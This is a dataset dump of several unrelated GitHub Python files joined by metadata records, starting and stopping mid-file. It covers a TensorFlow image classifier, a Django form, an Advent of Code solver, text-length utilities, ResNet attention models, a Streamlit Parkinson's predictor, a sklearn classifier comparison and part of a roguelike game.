tf.get_variable('biases',\r\n shape=[16],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n conv1 = tf.nn.conv2d(image, w,\r\n strides=[1, 1, 1, 1],\r\n padding='SAME')\r\n conv1 = tf.nn.bias_add(conv1, b)\r\n output1 = tf.nn.relu(conv1, name=scope.name)\r\n\r\n with tf.variable_scope('pooling_layer1') as scope:\r\n pooling1 = tf.nn.max_pool(output1,\r\n ksize=[1, 3, 3, 1],\r\n strides=[1, 2, 2, 1],\r\n padding='SAME')\r\n\r\n with tf.variable_scope('conv_layer2') as scope:\r\n w2 = tf.get_variable('weights',\r\n shape=[3, 3, 16, 16],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.1, dtype=tf.float32))\r\n b2 = tf.get_variable('biases',\r\n shape=[16],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n conv2 = tf.nn.conv2d(pooling1, w2,\r\n strides=[1, 1, 1, 1],\r\n padding='SAME')\r\n conv2 = tf.nn.bias_add(conv2, b2)\r\n output2 = tf.nn.relu(conv2)\r\n\r\n with tf.variable_scope('pooling_layer2') as scope:\r\n pooling2 = tf.nn.max_pool(output2,\r\n ksize=[1, 3, 3, 1],\r\n strides=[1, 2, 2, 1],\r\n padding='SAME')\r\n\r\n with tf.variable_scope('fully_connected1') as scope:\r\n output2_flat = tf.reshape(pooling2, shape=[batch_size, -1])\r\n dim = output2_flat.get_shape()[1].value\r\n w3 = tf.get_variable('weights',\r\n shape=[dim, 128],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.005, dtype=tf.float32))\r\n b3 = tf.get_variable('biases',\r\n shape=[128],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n output3 = tf.nn.relu(tf.matmul(output2_flat, w3) + b3)\r\n\r\n with tf.variable_scope('fully_connected2') as scope:\r\n w4 = tf.get_variable('weights',\r\n shape=[128, 128],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.005, dtype=tf.float32))\r\n b4 = tf.get_variable('biases',\r\n shape=[128],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n output4 = tf.nn.relu(tf.add(tf.matmul(output3, w4), b4))\r\n\r\n with tf.variable_scope('final_result') as scope:\r\n w5 = tf.get_variable('weights',\r\n shape=[128, n_class],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.005, dtype=tf.float32))\r\n b5 = tf.get_variable('biases',\r\n shape=[n_class],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n output5 = tf.add(tf.matmul(output4, w5), b5)\r\n\r\n return output5\r\n\r\ndef loss_func(logits, labels):\r\n with tf.variable_scope('loss') as scope:\r\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels)\r\n cross_entropy = tf.reduce_mean(cross_entropy)\r\n return cross_entropy\r\n\r\ndef training(loss, learning_rate):\r\n with tf.name_scope('optimizer') as scope:\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\r\n global_step = tf.Variable(0, trainable=False)\r\n optimizer = optimizer.minimize(loss, global_step=global_step)\r\n return optimizer\r\n\r\n\r\ndef evaluation(logits, labels):\r\n with tf.variable_scope('accuracy') as scope:\r\n correct = tf.nn.in_top_k(logits, labels, 1)\r\n correct = tf.cast(correct, tf.float32)\r\n accuracy = tf.reduce_mean(correct)\r\n return accuracy\r\n\r\n\r\n\r\nBatch_size = 8\r\nWidth = 150\r\nHeight = 150\r\nn_data_set = 80\r\nn_class = 2\r\nmax_step = 15000\r\nlearning_rate = 0.0001\r\n\r\n\r\ndef run_training():\r\n train_data_dir = \"C:\\\\Users\\\\lyf58\\\\PycharmProjects\\\\CatVsDog\\\\catDog\"\r\n\r\n image_list, label_list = read_files(train_data_dir, n_data_set)\r\n image_batch, label_batch = get_batch(image_list,\r\n label_list,\r\n Width,\r\n Height,\r\n Batch_size)\r\n\r\n train_logits = inference(image_batch, Batch_size, n_class)\r\n train_loss = loss_func(train_logits, label_batch)\r\n train_optimizer = training(train_loss, learning_rate)\r\n train_accuracy = evaluation(train_logits, label_batch)\r\n\r\n with tf.Session() as sess:\r\n\r\n sess.run(tf.global_variables_initializer())\r\n\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n\r\n try:\r\n for step in np.arange(max_step):\r\n if coord.should_stop():\r\n break\r\n _, tra_loss, tra_acc = sess.run([train_optimizer, train_loss, train_accuracy])\r\n\r\n if step % 20 == 0:\r\n print(step, tra_loss, tra_acc)\r\n\r\n except tf.errors.OutOfRangeError:\r\n print(\"error\")\r\n finally:\r\n coord.request_stop()\r\n\r\n coord.join(threads)\r\n sess.close()\r\n\r\n\r\n\r\nrun_training()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yufan88/Neural-Networks","sub_path":"singleLayerTestFile/imageClassification.py","file_name":"imageClassification.py","file_ext":"py","file_size_in_byte":8321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8731726861","text":"#coding:utf-8\nfrom django import forms\n\nimage = forms.ImageField(required=False)\n\nclass ContactForm(forms.Form):\n subject = forms.CharField(max_length=100)\n email = forms.EmailField(required=False, label=\"E-mail\")\n message = forms.CharField(widget=forms.Textarea)\n\n def clean_message(self):\n message = self.cleaned_data['message']\n num_words = len(message.split())#针对中文 len(message)\n if num_words < 4:\n raise forms.ValidationError(\"Not enough words!\")\n return message\n","repo_name":"vose2008/Learn","sub_path":"django/The_django_book/mysite/books/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43408032832","text":"with open(\"input.txt\", \"r\") as input_file:\n lines = input_file.read().strip().split(\"\\n\")\n\npoints = [(int(x), int(y)) for x, y in (l.split(',') for l in lines if ',' in l)]\n\nmax_x = max(x for x, _ in points)\nmax_y = max(y for _, y in points)\n\ngrid = [['.' for _ in range(max_x + 1)] for _ in range(max_y + 1)]\n\ndef print_grid():\n dots = 0\n\n for y in range(max_y + 1):\n for x in range(max_x + 1):\n print(grid[y][x], end='')\n if grid[y][x] == '#':\n dots += 1\n print()\n print()\n return dots\n\nfor x, y in points:\n grid[y][x] = '#'\n\ndef fold_y(fold_axis):\n global max_y\n for y in range(fold_axis):\n for x in range(max_x + 1):\n if grid[max_y - y][x] == '#':\n grid[y][x] = grid[max_y - y][x]\n max_y = fold_axis - 1\n\ndef fold_x(fold_axis):\n global max_x\n for x in range(fold_axis):\n for y in range(max_y + 1):\n if grid[y][max_x - x] == '#':\n grid[y][x] = grid[y][max_x - x]\n max_x = fold_axis - 1\n\nfold_x(655)\nfold_y(447)\nfold_x(327)\nfold_y(223)\nfold_x(163)\nfold_y(111)\nfold_x(81)\nfold_y(55)\nfold_x(40)\nfold_y(27)\nfold_y(13)\nfold_y(6)\ndots = print_grid()\nprint(f'Dots: ${dots}')\n\n# HEJHJRCJ","repo_name":"jakubka/advent-of-code-2021","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32189667417","text":"import syllables\n\n\ndef find_long_sentences(document):\n long_sentences = []\n for item in list(document.sents):\n word_count = len(item)\n for i in item:\n if i.is_punct:\n word_count -= 1\n if word_count >= 17:\n sentence = dict()\n sentence[\"text\"] = item.text\n sentence[\"index\"] = item.start_char\n sentence[\"length\"] = item.end_char - item.start_char\n long_sentences.append(sentence)\n return long_sentences\n\n\ndef find_long_words(document):\n long_words = []\n for token in document:\n if syllables.estimate(token.text) >= 4:\n long_word = dict()\n long_word[\"text\"] = token.text\n long_word[\"index\"] = token.idx\n long_word[\"length\"] = len(token.text)\n long_words.append(long_word)\n return long_words\n\n\ndef get_long_texts(document):\n long_sentences = find_long_sentences(document)\n long_words = find_long_words(document)\n long_texts = dict()\n long_texts[\"long_sentences\"] = long_sentences\n long_texts[\"long_words\"] = long_words\n return long_texts","repo_name":"rreynolds46/emailanalyzer","sub_path":"Utilities/long_text_finder.py","file_name":"long_text_finder.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41743831876","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 26 14:33:42 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn import metrics\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\ndef prep(dataset):\r\n #dataset = dataset.drop([\"FileName\",\"Date\",\"SegFile\",\"b\",\"e\",\"DR\"],axis=1)\r\n print(\"========= Head =========\")\r\n print(dataset.head())\r\n print(\"========= Column =========\")\r\n print(dataset.columns)\r\n print(\"========= Shape =========\")\r\n print(dataset.shape)\r\n print(\"========= Missing Values =========\")\r\n print(dataset.isnull().sum())\r\n dataset = dataset.dropna() \r\n print(\"========= Data Type =========\")\r\n print(dataset.dtypes)\r\n return dataset\r\n\r\ndef preproses_minmax(data):\r\n from sklearn.preprocessing import MinMaxScaler\r\n scaler = MinMaxScaler(feature_range=(0, 1))\r\n rescaledX = scaler.fit_transform(data)\r\n return rescaledX\r\n \r\n \r\ndef preproses_standarize(data):\r\n from sklearn.preprocessing import StandardScaler\r\n scaler = StandardScaler().fit(data)\r\n rescaledX = scaler.transform(data)\r\n return rescaledX\r\n\r\ndef holdout(X,y,test):\r\n from sklearn.model_selection import train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test, random_state=0)\r\n return X_train, X_test, y_train, y_test\r\n\r\ndef klasifikasi_kfold(X,y):\r\n \r\n run_kfold = pd.DataFrame({},columns=['Model','Fold','Akurasi']) \r\n\r\n def hasil(expected,predicted,nama,i):\r\n print(\"========== {} - Fold - {} ==========\".format(nama,i))\r\n print(metrics.confusion_matrix(expected,predicted))\r\n print(metrics.classification_report(expected,predicted))\r\n print(\"Accuracy = {}\".format(accuracy_score(expected, predicted)))\r\n \r\n i = 1\r\n skf = StratifiedKFold(n_splits=3)\r\n for train,test in skf.split(X,y):\r\n X_train, X_test, y_train, y_test = X[train],X[test],y[train],y[test]\r\n \r\n #Logistic Regression\r\n model = LogisticRegression(max_iter=10000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Logistic Regression\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Logistic Regression\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #Decision Tree\r\n model = DecisionTreeClassifier()\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"Decision Tree\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Decision Tree\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #MLPClassifier\r\n model = MLPClassifier(activation='logistic', solver='lbfgs', alpha = 1e-5, \r\n hidden_layer_sizes=(16,14), random_state=0,max_iter=100000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"MLP Classifier\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"MLPClassifier\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #SVM\r\n model = SVC(kernel='linear',random_state=0)\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"SVM\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"SVM\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #Random Forest\r\n model = RandomForestClassifier(n_estimators=2000,criterion='entropy',random_state=0)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Random Forest\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Random Forest\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #Naive Bayes\r\n model = GaussianNB()\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Gaussian Naive Bayes\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Naive Bayes\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #KNN\r\n model = KNeighborsClassifier(n_neighbors=3)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"KNN\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"KNN\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n i=i+1\r\n \r\n return run_kfold\r\n\r\ndef klasifikasi(X,y):\r\n \r\n run = pd.DataFrame({},columns=['Model','Akurasi']) \r\n def hasil(expected,predicted,nama):\r\n print(\"========== {} ==========\".format(nama))\r\n print(metrics.confusion_matrix(expected,predicted))\r\n print(metrics.classification_report(expected,predicted))\r\n\r\n X_train,X_test,y_train,y_test = holdout(X,y,0.2)\r\n \r\n #Logistic Regression\r\n model = LogisticRegression(max_iter=10000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Logistic Regression\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Logistic Regression\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #Decision Tree\r\n model = DecisionTreeClassifier()\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"Decision Tree\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Decision Tree\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #MLPClassifier\r\n model = MLPClassifier(activation='logistic', solver='lbfgs', alpha = 1e-5, \r\n hidden_layer_sizes=(16,14), random_state=0,max_iter=100000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"MLP Classifier\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"MLPClassifier\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #SVM\r\n model = SVC(kernel='linear',random_state=0)\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"SVM\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"SVM\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #Random Forest\r\n model = RandomForestClassifier(n_estimators=2000,criterion='entropy',random_state=0)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Random Forest\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Random Forest\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #Naive Bayes\r\n model = GaussianNB()\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Gaussian Naive Bayes\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Naive Bayes\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #KNN\r\n model = KNeighborsClassifier(n_neighbors=3)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"KNN\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"KNN\",'Akurasi':Acc},ignore_index=True)\r\n \r\n return run\r\n \r\ndef feature_PCA(X):\r\n pca = PCA(n_components=21) #Coba-coba n_components nya\r\n principalComponents = pca.fit_transform(X)\r\n variance_ratio = pca.explained_variance_ratio_\r\n print(variance_ratio)\r\n return principalComponents\r\n\r\n\r\nrun = pd.DataFrame({},columns=['Model','Akurasi']) \r\nrun_kfold = pd.DataFrame({},columns=['Model','Fold','Akurasi']) \r\ndf = pd.read_csv(\"CTG.csv\")\r\ndf = df.replace('?',np.nan)\r\ndf = prep(df)\r\n\r\n#3 Class Classification\r\nfitur = ['AC','FM','UC','DL','DS','DP','LB','ASTV','MSTV','ALTV','MLTV','Width','Min','Max','Nmax',\r\n 'Nzeros','Mode','Mean','Median','Variance','Tendency']\r\nX = np.array(df[fitur])\r\ny = np.array(df['NSP'])\r\n\r\n#Preproses\r\nX = preproses_minmax(X) #MinMax\r\n#X = preproses_standarize(X) #StandardScaler\r\n\r\n#X = feature_PCA(X)\r\n\r\n#Classification\r\nrun = klasifikasi(X,y)\r\nrun_kfold = klasifikasi_kfold(X,y)\r\n\r\n","repo_name":"pradistaa/compared-machinelearning-algorithm-fetalheartrate-classification","sub_path":"TA.py","file_name":"TA.py","file_ext":"py","file_size_in_byte":8457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14625441621","text":"import viewA\nimport datbaseA\ndef main():\n while True:\n op = viewA.get_op()\n if op == 1:\n data_worker = viewA.get_data()\n datbaseA.add_data(data_worker)\n if op == 2:\n find_str = viewA.find_person()\n datbaseA.find_person(find_str)\n if op == 3:\n worker = viewA.find_person()\n user_lst, full_lst = datbaseA.select_data_person(worker)\n num_line = viewA.choose_str()\n datbaseA.delete_data_person(user_lst, full_lst, num_line)\n if op == 4:\n worker = viewA.find_person()\n user_lst, full_lst = datbaseA.select_data_person(worker)\n num_line = viewA.choose_str()\n data_worker = viewA.get_data()\n datbaseA.change_data_person(user_lst, full_lst, num_line, data_worker)\n if op == 5:\n print(\"Выход\")\n break\n\n","repo_name":"RomZorro/GB_Python","sub_path":"HW8_200323_Artur_variant/controlleA.py","file_name":"controlleA.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7441936596","text":"import streamlit as st\nimport pandas as pd\nfrom catboost import CatBoostClassifier\nimport pickle\n\n# loading the saved models\nparkinsons_model = pickle.load(open(r'parkinsons_model1.pkl', 'rb'))\n\nst.write(\"\"\"\n# Simple Parkinson Prediction App\nThis app predicts if a patient has Parkinson's Disease!\n\"\"\")\n\n# CSV file upload\nuploaded_file = st.sidebar.file_uploader(\"Upload your input CSV file\", type=[\"csv\"])\n\nif uploaded_file is not None:\n input_df = pd.read_csv(uploaded_file)\n\n # predictions\n predictions = parkinsons_model.predict(input_df)\n input_df['Prediction'] = predictions\n\n # show predictions\n st.write(input_df)\n\n\n# show form\nst.title(\"Parkinson's Disease Prediction using ML\")\n\ncol1, col2, col3, col4= st.columns(4) \n\nwith col1:\n fo = st.slider('MDVP:Fo(Hz)', -1.0, 1.0, -1.0)\n RAP = st.slider('MDVP:RAP', -1.0, 1.0, -1.0)\n HNR = st.slider('HNR', -1.0, 1.0, 1.0)\n spread2 = st.slider('spread2', -1.0, 1.0, -1.0)\n \nwith col2:\n fhi = st.slider('MDVP:Fhi(Hz)', -1.0, 1.0, -1.0)\n APQ3 = st.slider('Shimmer:APQ3', -1.0, 1.0, -1.0)\n RPDE = st.slider('RPDE', -1.0, 1.0, -1.0)\n D2 = st.slider('D2', -1.0, 1.0, -1.0)\n \nwith col3:\n flo = st.slider('MDVP:Flo(Hz)', -1.0, 1.0, 1.0)\n APQ = st.slider('MDVP:APQ', -1.0, 1.0, 0.0)\n DFA = st.slider('DFE', -1.0, 1.0, 1.0)\n \nwith col4:\n Jitter_Abs = st.slider('MDVP:Jitter(Abs)', -1.0, 1.0, 0.0)\n NHR = st.slider('NHR', -1.0, 1.0, -1.0)\n spread1 = st.slider('spread1', -1.0, 1.0, -1.0)\n \n\n# predict\nif st.button(\"Parkinson's Test Result\"):\n features = [[fo, fhi, flo, Jitter_Abs, RAP,APQ3,APQ,NHR,HNR,RPDE,DFA,spread1,spread2,D2]]\n predictions = parkinsons_model.predict(features)\n\n if predictions[0] == 1:\n st.success(\"The person has Parkinson's disease\")\n else:\n st.success(\"The person does not have Parkinson's disease\")\n","repo_name":"WongSC13/streamlit_parkinson","sub_path":"streamlit_parkinson_v5.py","file_name":"streamlit_parkinson_v5.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30124446901","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nfrom torch.nn import init\nfrom .attention import *\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass target(nn.Module): \n def __init__(self, feat_type='feature'):\n super(target, self).__init__()\n self.feat_type = feat_type\n \n def forward(self, x):\n if self.feat_type == 'feature':\n return x\n elif self.feat_type == 'attention':\n return x\n else:\n raise('Select Proper Feat Type')\n \nclass identity(nn.Module):\n def forward(self, out):\n return out, []\n \n \nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, attention_type='ir'):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n self.attention_type = attention_type\n \n \n # Attention Type\n if attention_type == 'ir':\n self.attention = identity()\n elif attention_type == 'cbam':\n self.attention = CBAM(planes, 16)\n elif attention_type == 'se':\n self.attention = SELayer(planes, 16)\n else:\n raise('Select Proper Attention Type')\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n # Calculation Attention\n out, _ = self.attention(out)\n out += residual\n out = self.relu(out)\n return out\n \n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, attention_type='ir'):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.attention_type = attention_type\n \n \n # Attention Type\n if attention_type == 'ir':\n self.attention = identity()\n elif attention_type == 'cbam':\n self.attention = CBAM(planes * 4, 16)\n elif attention_type == 'se':\n self.attention = SELayer(planes * 4, 16)\n else:\n raise('Select Proper Attention Type')\n\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n # Calculation Attention\n out, _ = self.attention(out)\n out += residual\n out = self.relu(out)\n\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes=1000, attention_type=None, imagenet=True):\n self.inplanes = 64\n super(ResNet, self).__init__()\n # different model config between ImageNet and CIFAR \n self.imagenet = imagenet\n \n if self.imagenet:\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n else:\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AdaptiveAvgPool2d((1,1))\n \n self.layer1 = self._make_layer(block, 64, layers[0], stride=1, attention_type=attention_type)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2, attention_type=attention_type)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2, attention_type=attention_type)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2, attention_type=attention_type)\n\n if self.imagenet:\n self.conv_bridge = nn.Conv2d(512 * block.expansion, 3072, kernel_size=3, stride=1, padding=1)\n else:\n self.conv_bridge = nn.Conv2d(512 * block.expansion, 512, kernel_size=3, stride=1, padding=1)\n\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n \n \n init.kaiming_normal(self.fc.weight)\n for key in self.state_dict():\n if key.split('.')[-1]==\"weight\":\n if \"conv\" in key:\n init.kaiming_normal(self.state_dict()[key], mode='fan_out')\n if \"bn\" in key:\n if \"SpatialGate\" in key:\n self.state_dict()[key][...] = 0\n else:\n self.state_dict()[key][...] = 1\n elif key.split(\".\")[-1]=='bias':\n self.state_dict()[key][...] = 0\n\n\n def _make_layer(self, block, planes, blocks, stride=1, attention_type='ir'):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, attention_type=attention_type))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, attention_type=attention_type))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, train=True):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n if self.imagenet:\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n # Bridge and Reconstruction\n if train:\n x_recon = self.conv_bridge(x)\n\n x = self.avgpool(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n \n if train:\n return x, x_recon\n else:\n return x\n\n\ndef load_resnet(depth, num_classes, attention_type, imagenet):\n assert depth in [18, 34, 50, 101], 'network depth should be 18, 34, 50 or 101'\n\n if depth == 18:\n model = ResNet(BasicBlock, [2, 2, 2, 2], num_classes, attention_type=attention_type, imagenet=imagenet)\n\n elif depth == 34:\n model = ResNet(BasicBlock, [3, 4, 6, 3], num_classes, attention_type=attention_type, imagenet=imagenet)\n\n elif depth == 50:\n model = ResNet(Bottleneck, [3, 4, 6, 3], num_classes, attention_type=attention_type, imagenet=imagenet)\n\n elif depth == 101:\n model = ResNet(Bottleneck, [3, 4, 23, 3], num_classes, attention_type=attention_type, imagenet=imagenet)\n\n return model\n\n\nif __name__=='__main__':\n model = load_resnet(50, 1000, 'cbam')\n x = torch.ones([1, 3, 256, 256])\n out, out_recon = model(x, train=True)\n print(out)","repo_name":"tjdhg456/QualNet-Pytorch","sub_path":"object_classification/module/backbone/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":7911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10633965735","text":"from math import ceil\nfrom collections import Counter\n\nfrom src.geometry.direction import DIRS, directions_on\nfrom src.mobile.mobile_object import MobileObject\nfrom data.res import walkable_for_players, npc, max_armor_value, traders\nfrom src.geometry.geometry import distance, square, manhattan, ring\n\n\nclass Player(MobileObject):\n window_height = 21\n window_width = 31\n pickup_distance = 1\n talking_distance = 2\n max_hp = 0\n max_ap = 0\n class_ = \"Никто\"\n descr = \"мистер Никто\"\n see = 12\n opponents = npc\n\n def __init__(self, name):\n super().__init__('игрок', '@' + name[0])\n self.name = name\n self.money = 0\n self.see = 12\n self.possible_keys = ['move_player', 'nothing', 'open_inventory', 'use', 'remove',\n 'info', 'showshopitems', 'trade', 'share', 'equip',\n 'use_main_weapon', \"use_second_weapon\" 'unequip', 'magic']\n self.inventory = []\n self.magicbook = []\n self.walkable_objects = walkable_for_players\n self.last_happend = \"\"\n self.next_level_exp = int(self.level ** 1.5 * 2 + 10)\n\n def start_equip(self):\n pass\n\n def level_up(self):\n if self.exp < self.next_level_exp: return ''\n message = \"\"\n while self.exp >= self.next_level_exp:\n self.exp -= self.next_level_exp\n self.level += 1\n self.next_level_exp = int(self.level ** 1.5 * 2 + 10)\n self.max_hp += 1\n self.see += 1\n self.heal()\n if self.level % 4 == 0: self.max_ap += 1\n message = '\\n{} теперь имеет {} уровень'.format(self.name, self.level)\n if self.level % 2 == 0:\n self.world.power_up_monsters()\n message += \", монстры так же увеличили свою силу\"\n return message\n\n def stats(self):\n return '{name}, {_class}, уровень {level}:\\n[HP = {hp}, AP = {ap}, Защита = {armor}]. Деньги = {money}, EXP = {exp}'.format(\n name=self.name, _class=self.class_, hp=self.hp,\n armor=sum(a.block for a in self.equipment.values() if a is not None and a.kind == 'armor'),\n ap=self.ap, money=self.money, 